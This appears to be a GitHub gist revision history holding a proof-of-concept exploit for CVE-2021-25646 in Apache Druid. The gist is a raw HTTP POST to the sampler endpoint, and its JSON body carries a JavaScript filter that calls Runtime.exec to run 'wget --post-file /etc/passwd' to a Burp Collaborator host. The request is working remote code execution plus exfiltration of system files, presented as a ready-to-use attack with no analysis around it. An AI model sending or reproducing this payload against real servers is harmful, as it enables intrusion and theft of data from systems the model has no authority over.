RASSec · February 5, 2021 06:53 · Feb 3, 2021 · Feb 3, 2021 · Feb 3, 2021 · Feb 3, 2021
diff --git a/CVE-2021-25646.md b/CVE-2021-25646.md
@@ -1,3 +1,4 @@
+```
 POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
 Host: REDACTED
 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
@@ -16,3 +17,4 @@ Connection: close
                                 }
                         }
   },"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}
+  ```
diff --git a/gistfile1.txt → CVE-2021-25646.md b/gistfile1.txt → CVE-2021-25646.md
diff --git a/gistfile1.txt b/gistfile1.txt
@@ -0,0 +1,18 @@
+POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
+Host: REDACTED
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: application/json, text/plain, */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/json
+Content-Length: 1006
+Connection: close
+
+{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript",
+                                        "function": "function(value){return java.lang.Runtime.getRuntime().exec('wget --post-file /etc/passwd burpcollaborator.net')}",
+                                        "dimension": "added",
+                                        "": {
+                                                "enabled": "true"
+                                        }
+                                }
+                        }
+  },"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}